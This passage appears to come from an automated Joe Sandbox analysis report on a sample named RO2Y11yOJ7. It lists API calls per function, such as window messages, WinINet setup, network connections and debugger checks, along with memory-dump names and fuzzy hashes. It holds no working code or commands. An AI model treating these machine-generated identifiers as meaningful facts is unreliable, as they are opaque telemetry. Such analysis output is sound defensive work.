                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003820E0
                                                          • ReleaseDC.USER32(?), ref: 00382101
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: a18238f37edab8fa703dd718c8ca37eeb78c96056c1ee27f0b9c7737fa7d6a4b
                                                          • Instruction ID: 9c6cea6dce18dd826951e9bf210048520272edee7f99735bee5149e20ee89e2a
                                                          • Opcode Fuzzy Hash: a18238f37edab8fa703dd718c8ca37eeb78c96056c1ee27f0b9c7737fa7d6a4b
                                                          • Instruction Fuzzy Hash: 17E0E5B5800204EFCB02AF60C808A9E7FFAEB4C350F108025F85ADB220CB38A1519F40
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 003820CA
                                                          • GetDC.USER32(00000000), ref: 003820D4
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003820E0
                                                          • ReleaseDC.USER32(?), ref: 00382101
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 05da15738074e08fd8089cb5e46739870aa6d2b370960da257b6eadc92dcf5a1
                                                          • Instruction ID: f44c6b572fcf92bf896325cc38a155940a67d58307f63beecf80e91d12b8dc3b
                                                          • Opcode Fuzzy Hash: 05da15738074e08fd8089cb5e46739870aa6d2b370960da257b6eadc92dcf5a1
                                                          • Instruction Fuzzy Hash: ECE0E5B5800204AFCB029F60C808A9D7FEAAB4C310F108025F95ADB220CB38B1519F40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %=
                                                          • API String ID: 0-1420429418
                                                          • Opcode ID: d9d1edfd85b989e66a5a420dff9f71bbe51f5e19bb4cfbb0e0a1eb55f2c35384
                                                          • Instruction ID: 9b1521deba7a0ed72759e8ed71ef7b1acd96c7850f2c030b065096c6c86c9afa
                                                          • Opcode Fuzzy Hash: d9d1edfd85b989e66a5a420dff9f71bbe51f5e19bb4cfbb0e0a1eb55f2c35384
                                                          • Instruction Fuzzy Hash: 57B1A171D001099BCF26EF94C8929FEB7F9EF46310F514066E502AF295DB34AE85CB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __itow_s
                                                          • String ID: xb@$xb@
                                                          • API String ID: 3653519197-193068574
                                                          • Opcode ID: 182759ea62d65811569ce99678e4b1c4dc90deef3154cd3171f5e21ea3360a43
                                                          • Instruction ID: e9415f64ff3d1eb192460410e3a3970ca4d3f390080f600c95ce9dd70895479a
                                                          • Opcode Fuzzy Hash: 182759ea62d65811569ce99678e4b1c4dc90deef3154cd3171f5e21ea3360a43
                                                          • Instruction Fuzzy Hash: 40B17D74A00209ABDB16EF58C890EEEF7F9EF58304F148459FA459F691DB70E941CB60
                                                          APIs
                                                            • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • __wcsnicmp.LIBCMT ref: 003AB0B9
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003AB182
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: a8bcc5ee70e4a0ef330712cf875caadce3bc9f562174d2aa8949fc15420776f7
                                                          • Instruction ID: 79e6044c68975d2300c2206d3b10779678903cbe7c889f205766cb98be99ee20
                                                          • Opcode Fuzzy Hash: a8bcc5ee70e4a0ef330712cf875caadce3bc9f562174d2aa8949fc15420776f7
                                                          • Instruction Fuzzy Hash: C7618175A00215AFCB16DF94C891EAEF7F8EF09310F11405AF956AB352DB70AE40CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: Oa5
                                                          • API String ID: 4104443479-2933034282
                                                          • Opcode ID: 502adf4fe4c50110a582b4a12e892e2c9841f351769f8db8e031da664f56df83
                                                          • Instruction ID: a17986cd1a9895ad811c90965ac231e91069361c8fe6dd4bf3f6c2c5944a93d9
                                                          • Opcode Fuzzy Hash: 502adf4fe4c50110a582b4a12e892e2c9841f351769f8db8e031da664f56df83
                                                          • Instruction Fuzzy Hash: 7B518EB0A00609DFCF26DF68C880AAEB7F5FF44304F558569E85AD7290EB30AD55CB51
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00352AC8
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00352AE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
  • Part of subcall function 0034506B: __fread_nolock.LIBCMT ref: 00345089
• _wcscmp.LIBCMT ref: 003A98CD
• _wcscmp.LIBCMT ref: 003A98E0
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
APIs
Strings
Similarity
• API ID: ClearVariant
• String ID: Dd@$Dd@
• API String ID: 1473721057-3375393111
APIs
• _memset.LIBCMT ref: 003B26B4
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003B26EA
Strings
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 003C7B93
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C7BA8
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 003C6B49
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C6B85
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 003A2C09
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A2C44
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C6793
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C679E
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
  • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
  • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
• GetWindowRect.USER32(00000000,?), ref: 003C6CA3
• GetSysColor.USER32(00000012), ref: 003C6CBD
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 003C69D4
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C69E3
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 003A2D1A
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003A2D39
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003B2342
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003B236B
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C26,004052F8,?,?,?), ref: 00350ACE
  • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
• _wcscat.LIBCMT ref: 00385010
Strings
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: S@
                                                          • API String ID: 257928180-58448795
                                                          • Opcode ID: 657fecbe7ac8d395f694533ed846c70823ffd07421cc9236ef5e1964a486e512
                                                          • Instruction ID: ca8cf1b44e996de340ad3a43350621d89d43b85eba2226f121535cb12ddcc464
                                                          • Opcode Fuzzy Hash: 657fecbe7ac8d395f694533ed846c70823ffd07421cc9236ef5e1964a486e512
                                                          • Instruction Fuzzy Hash: 5611A5359042089ACB46FB64DD42EDAB7F8EF08341B0040A6BD48DF1A0DB75EB888B55
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00399135
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 009a01b1a6dc796a385c1f8f54b559fd2a646c04c9fad11e2ee275a68c3794e4
                                                          • Instruction ID: d85b414b6b3c5c3795f1025ce1e6d1454718943685802aa653e804754f2c90c5
                                                          • Opcode Fuzzy Hash: 009a01b1a6dc796a385c1f8f54b559fd2a646c04c9fad11e2ee275a68c3794e4
                                                          • Instruction Fuzzy Hash: DF01F931A05215ABDF06EB68CC959FE7369FF06310B14061AF4715F2D2DA3568088750
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 443f3568fcc2ccd95c11168738d7765dd6425963d2de896ab01318189518cf1d
                                                          • Instruction ID: dbf99edd04daaae43d7b4d44098f05d58d75fb7a83c9855173d2694dfa67e041
                                                          • Opcode Fuzzy Hash: 443f3568fcc2ccd95c11168738d7765dd6425963d2de896ab01318189518cf1d
                                                          • Instruction Fuzzy Hash: 05012D72D04218BEDB29CBA8CC16EFE7BFCDB01301F00459EF552D6181E9B4E6048760
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0039902D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 67f80a3174877e5b0b2789775531cdd05a2f37db62e6af5924c97d1917e676fd
                                                          • Instruction ID: d1423376718e0698579d3e5c780b4885ae03ed47ba09b4e8ca81c4025b946e08
                                                          • Opcode Fuzzy Hash: 67f80a3174877e5b0b2789775531cdd05a2f37db62e6af5924c97d1917e676fd
                                                          • Instruction Fuzzy Hash: 7401A771A451086BDF17E7A4CC96EFE73ACDF15340F14011AB9126B292DE256E0C96B1
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003990B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: b5566db7378f88f02681088504590bd1373a52d1f1b4caef13f5f61bed1cc83d
                                                          • Instruction ID: 8e9ec3a34c928c027e3f76ba1292063531367ce1693964543a90d01429dc4f23
                                                          • Opcode Fuzzy Hash: b5566db7378f88f02681088504590bd1373a52d1f1b4caef13f5f61bed1cc83d
                                                          • Instruction Fuzzy Hash: 1A01D671A451196BDF03E7A8CD86EFE73AC9F15340F14011AB9126B392DA266E0C92B2
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0039C7F6
                                                            • Part of subcall function 0039CB06: _memmove.LIBCMT ref: 0039CB50
                                                            • Part of subcall function 0039CB06: VariantInit.OLEAUT32(00000000), ref: 0039CB72
                                                            • Part of subcall function 0039CB06: VariantCopy.OLEAUT32(00000000,?), ref: 0039CB7C
                                                          • VariantClear.OLEAUT32(?), ref: 0039C818
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$Init$ClearCopy_memmove
                                                          • String ID: d}?
                                                          • API String ID: 2932060187-2624098408
                                                          • Opcode ID: f86795ce381186f7d46f6397c8ac1ef6f6fd8354457fe9de7489e45db1c322ee
                                                          • Instruction ID: ae422c172b9f934338932fdf3ce3f57181a56c2bdfe9bff0b1f4cddfb6edf7b4
                                                          • Opcode Fuzzy Hash: f86795ce381186f7d46f6397c8ac1ef6f6fd8354457fe9de7489e45db1c322ee
                                                          • Instruction Fuzzy Hash: 7F110C719007089FC721DFAAD88499BF7F8FF08310B50862FE54ADB611E771AA44CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 9c7a31cea5d7ef153efdec1848801b6e80a7fdc804a3503c8a0789ce3cdeb064
                                                          • Instruction ID: 90b74892ea76293311a841077da27d49300e21681706703ce6b31aff45bfec85
                                                          • Opcode Fuzzy Hash: 9c7a31cea5d7ef153efdec1848801b6e80a7fdc804a3503c8a0789ce3cdeb064
                                                          • Instruction Fuzzy Hash: 97E02232A002292BD3209B99AC09EA7FBACEB42760F010026FD04D7050DA60AA018BE0
                                                          APIs
                                                            • Part of subcall function 0037B494: _memset.LIBCMT ref: 0037B4A1
                                                            • Part of subcall function 00360AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0037B470,?,?,?,0034100A), ref: 00360AC5
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0034100A), ref: 0037B474
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0034100A), ref: 0037B483
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0037B47E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                                          • Instruction ID: abca28eee9ee41ca1d2c4d10247002ded2b947016fd57df895100d2a0f0ab71d
                                                          • Opcode Fuzzy Hash: 142b6ff1d7d6a92454d35996cda722fcaadb04ad4bdfd3018e028e0e56f68f62
                                                          • Instruction Fuzzy Hash: 99E06D78200B608FD3329F6AE908743BBE8AF00304F05CA6CE446C6241EBB8E444CBA1
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C59D7
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C59EA
                                                            • Part of subcall function 003A52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: fd0634120f434e78e665b300b7f3dd60f40ad2d6c6d6f92f6b8d6ccb45915530
                                                          • Instruction ID: bb40389e92f148a4eda5284e9ea3cdc8adbcd9f15745e965cfb8f57ff49ab95d
                                                          • Opcode Fuzzy Hash: fd0634120f434e78e665b300b7f3dd60f40ad2d6c6d6f92f6b8d6ccb45915530
                                                          • Instruction Fuzzy Hash: 60D0C931384711BBE669AB709C0BFE66A19AB05B50F000825B759EA1D0C9E4A8008754
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C5A17
                                                          • PostMessageW.USER32(00000000), ref: 003C5A1E
                                                            • Part of subcall function 003A52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 651dee8391d7a9c0738656f31b83133babc6a4cb39d11992fb313c6628a2055b
                                                          • Instruction ID: 9239f6669f0ed56302118e6a09ac5c0f75b96de217df9b0744be4a86d5bedd3e
                                                          • Opcode Fuzzy Hash: 651dee8391d7a9c0738656f31b83133babc6a4cb39d11992fb313c6628a2055b
                                                          • Instruction Fuzzy Hash: AAD0C9313C07117BE66AAB709C0BFD66A19AB06B50F000825B755EA1D0C9E4B8008758